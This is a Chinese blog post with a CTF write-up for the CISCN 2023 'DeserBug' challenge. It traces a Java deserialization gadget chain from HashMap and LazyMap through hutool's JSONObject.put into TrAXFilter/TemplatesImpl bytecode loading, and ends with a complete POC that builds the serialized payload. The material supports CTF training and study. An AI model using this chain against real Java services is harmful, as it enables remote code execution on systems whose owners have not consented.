[CISCN 2023]—DeserBug

已于 2023-05-30 20:07:51 修改
阅读量849 收藏 1
点赞数
文章标签: c# java json
于 2023-05-30 20:05:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54902210/article/details/130956079
版权

DeserBug

  • 题目描述:

    • cn.hutool.json.JSONObject.put->com.app.Myexpect#getAnyexcept

  • 附件

    • 链接:https://pan.baidu.com/s/1lVABZUxmdEmXHL092P-efA?pwd=up9t

题目分析

题目中有两个类:Testapp、Myexpect

Testapp

本地8888端口开启服务,获取bugstr传参内容并进行反序列化

在这里插入图片描述

根据依赖会想到CC反序列化,但题中给到的是CC3.2.2版本,CC自3.2.1后新添加了checkUnsafeSerialization功能对反序列化内容进行检测,而CC链常用到的InvokerTransformer就列入了黑名单中,不过题目给出了另一个类Myexpect

Myexpect

其中getAnyexcept定义了newInstance(),能够实例化一个单参数类

在这里插入图片描述

结合newInstance可以联想到TrAXFilter,借此实现Templates动态加载恶意字节码
在这里插入图片描述

getAnyexcept

接下来就是要找哪里调用了getAnyexcept,根据提示从cn.hutool.json.JSONObject.put查找

cn.hutool.json.JSONObject.put->com.app.Myexpect#getAnyexcept

经过一级级调用发现在PropDesc#getValue(),经过反射调用bean的getter方法

在这里插入图片描述

调用栈

getValue:154, PropDesc (cn.hutool.core.bean)
lambda$copy$0:66, BeanToMapCopier (cn.hutool.core.bean.copier)
accept:-1, 846238611 (cn.hutool.core.bean.copier.BeanToMapCopier$$Lambda$13)
forEach:684, LinkedHashMap (java.util)
copy:48, BeanToMapCopier (cn.hutool.core.bean.copier)
copy:16, BeanToMapCopier (cn.hutool.core.bean.copier)
copy:92, BeanCopier (cn.hutool.core.bean.copier)
beanToMap:713, BeanUtil (cn.hutool.core.bean)
mapFromBean:264, ObjectMapper (cn.hutool.json)
map:114, ObjectMapper (cn.hutool.json)
<init>:210, JSONObject (cn.hutool.json)
<init>:187, JSONObject (cn.hutool.json)
wrap:805, JSONUtil (cn.hutool.json)
set:393, JSONObject (cn.hutool.json)
set:352, JSONObject (cn.hutool.json)
put:340, JSONObject (cn.hutool.json)
put:32, JSONObject (cn.hutool.json)

put

接着就要看哪里调用了put,这里直接结合CC6的前半段即可

put:32, JSONObject (cn.hutool.json)
get:159, LazyMap (org.apache.commons.collections.map)
getValue:74, TiedMapEntry (org.apache.commons.collections.keyvalue)
hashCode:121, TiedMapEntry (org.apache.commons.collections.keyvalue)
hash:339, HashMap (java.util)
readObject:1413, HashMap (java.util)

POC

import cn.hutool.json.JSONObject;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

import static com.app.Tools.getBytes;
import static com.app.Tools.setFieldValue;
import static com.app.Tools.*;

public class POC {
    public static void main(String[] args) throws Exception {
        byte[] bytes = getBytes("Evil");
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_name", "Sentiment");
        setFieldValue(templates, "_class", null);
        setFieldValue(templates, "_bytecodes", new byte[][]{bytes});

        Myexpect myexpect = new Myexpect();
        myexpect.setTargetclass(TrAXFilter.class);
        myexpect.setTypeparam(new Class[]{Templates.class});
        myexpect.setTypearg(new Object[]{templates});

        JSONObject jsonObject = new JSONObject();

        ConstantTransformer transformer = new ConstantTransformer(1);
        Map outerMap  = LazyMap.decorate(jsonObject,transformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap , "Sentiment");

        HashMap hashMap = new HashMap();
        hashMap.put(tiedMapEntry, "1");

        jsonObject.remove("Sentiment");
        setFieldValue(transformer,"iConstant",myexpect);

        byte[] serialize = serialize(hashMap);
        System.out.println(Base64.getEncoder().encodeToString(serialize));
        //unserialize(serialize);
    }
}
S1nJa
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2023全国大学生信息安全竞赛(ciscn)初赛题解
返璞归真的博客
05-28 1万+
2023全国大学生信息安全竞赛(ciscn)部分题解
【Web】记录CISCN2023国赛初赛DeserBug题目复现
uuzeray的博客
03-15 1404
Hessian的链子审得有点疲劳,不如做做题吧,挑了国赛入手,整体做下来感觉十分丝滑&水到渠成,自然&通透。仅仅是记录一下菜鸡做题的感受,不会往深入了讲当时好像题目是不出网的,但我们就按出网的情况来做直接反弹shell,删繁就简。这题主要是要有两个思维敏感度,刚好就是提示的一头一尾cn.hutool.json.JSONObject.put:CC5/CC6调map.put的常规手法。
ciscn2023华北赛区
……
06-29 894
利用点在这里的os.system函数。这里的savepath是我们可控的,通过修改文件名就可以控制savepath的值,所以在os.system函数中拼接系统命令,本地运行进行调试。看到在本地是执行了命令的,但是页面上没有回显,考虑弹shell,因为不允许一些符号使用,所以用base64编码一下。利用不同类型a=1和b='1’绕过强等判断。这里通过’'符号来绕过,/f\l\a\g。这里禁止了通过数组绕过md5的方法。反序列化触发wakeup函数。payload拿到原题。
2023CISCN—华中赛区—pwn wp
m0_63437215的博客
07-13 1187
ciscn2023华中赛区pwn
2023CISCN部分wp
qq_51862722的博客
05-29 757
2023ciscn部分wp
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
ciscn介绍及参会准备事项.zip
最新发布
05-19
**CISCN介绍** CISCN,全称为“中国互联网安全大会”(China Internet Security Conference and Network),是中国网络安全领域的一项重要年度盛会。该会议由国内知名的安全组织、企业和专家学者共同发起,旨在搭建...
CISCN_frontend
04-17
前端界面展示(待定)项目模板来源安装:nodejs环境python3环境根目录下执行npm installpip install werkzeug flask flask_cors我这里用了伪后端(为了开发方便,后期融合到django中,到时候再进行更改),伪后端...
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【标题】"Double ciscn 2019 第十二届全国大学生信息安全竞赛"揭示了这是一个信息安全领域的竞赛,特别是针对大学生的。"全国大学生信息安全竞赛"是中国一项具有高影响力的年度赛事,旨在提升大学生的信息安全技能,...
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
2023CISCN初赛
这个人很懒,什么都懒得写
06-04 952
随便写写
[CISCN 2023 初赛]moveAside
weixin_52118017的博客
06-01 376
发现大抵是亦或,可根据uuid和flag头恢复2个key。ida反编译后定位查看字符串。今年国赛的一题,记录一下。将这个数组提取出来。
Ciscn_2021_lonelywolf
红叶的博客
03-18 185
在第一步中我们得到了tcache_struct的起始地址,我们只需要+0x10即可得到tcache_struct的数据段地址,因为tcache_struct本身也是一个堆。这里有一点需要注意,本题的libc是新版的2.27,具有检测Double Free的机制。机制是在tcache堆中的bk上存储了一段数据,称为key,如果检测到了key,即检测到Double Free。可以发现系统从0x55dc90f61000开辟了0x80,成了我们申请的堆块,变成了0x55dc90f61080,并且状态也改变了。
[2023CISCN]国赛初赛WEB题目复现
qq_42585535的博客
10-23 528
最近几个月在学免杀,JAVA安全以及JS相关内容,导致CTF摆了很久,这次复现国赛题目就当做恢复训练了。
2023 ciscn国赛pwn lojin wp
cainiao78777的博客
05-29 2356
第一次参加国赛,被队友带飞了,pwn只做出来了四个,1381分,第16名,总体来说还可以在所有题目中,也是拿到了pwn题login的一血话说回来,来详细说一下,这个pwn题的解法首先就是能看到这是个没附件的pwn题说明只能通过交互去得到信息,再寻找方向,连接之后应该就是这四个选项。
Hutool工具类的使用
Be yourself,everyone else is already taken
03-05 1591
Hutool是一个Java工具包,它帮助我们简化每一行代码,避免重复造轮子。如果你有需要用到某些工具方法的时候,不妨在Hutool里面找找,可能就有。本文将对Hutool中的常用工具类和方法进行介绍。 安装 maven项目在pom.xml添加以下依赖即可: <dependency> <groupId>cn.hutool</groupId> <artifactId>hutool-all</artifactId> <v
使用 hutool 工具类解析 json 对象
热门推荐
CREATE_17的博客
02-07 2万+
本文主要记录如何使用 hutool 工具类解析 json 对象 1、在 pom 文件内添加 hutool 依赖: <dependency> <groupId>cn.hutool</groupId> <artifactId>hutool-all</artifactId> <version>5.0...
使用Hutool向第三方的接口发起请求
qq_42155687的博客
07-20 6616
关于使用Hutool的HttpUtil和HttpRequest的工具请求第三方接口,并解决两个类型转换问题。
CISCN2022_login
weixin_51055545的博客
06-03 846
例行检查上来就是保护机制全开,直接到IDA中分析;逆向分析main函数:程序主逻辑在sub_FFD函数中, 要正确输入进入程序的菜单确实需要逆向好一会儿(大牛轻点儿喷),下边就是对菜单的三个函数的分析了,sub_DA8(): 这里就是很明显的一个写shellcode的地方,但存在检查机制;sub_EFE(): 将以上两个全局变量赋值为0的操作是通不过刚才的检查机制的,sub_CBD(): 这里选项1的话,就会进入到这个函数里,将unk_202028,unk_202024的值赋值为1,可以通过检查机制,思路我
OSError: [WinError 123] 文件名、目录名或卷标语法不正确。: 'D:\\[CISCN 2023 初赛]\\img_5e1b8d1b1db258f45d1059dbafc10f11\tmp4'
05-29
这个错误提示是在Windows系统下发生的,意思是文件名、目录名或卷标语法不正确。具体而言,是在路径名中有不合法的字符或格式。 根据错误提示信息,路径是'D:\\[CISCN 2023 初赛]\\img_5e1b8d1b1db258f45d1059dbafc10f11\tmp4',可以看出可能是路径名中包含了中括号"[]"这样的特殊字符,而这些字符在Windows系统中是不允许出现在路径名中的。因此,需要修改路径名中的这些特殊字符,或者将文件复制到不包含这些特殊字符的路径下。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值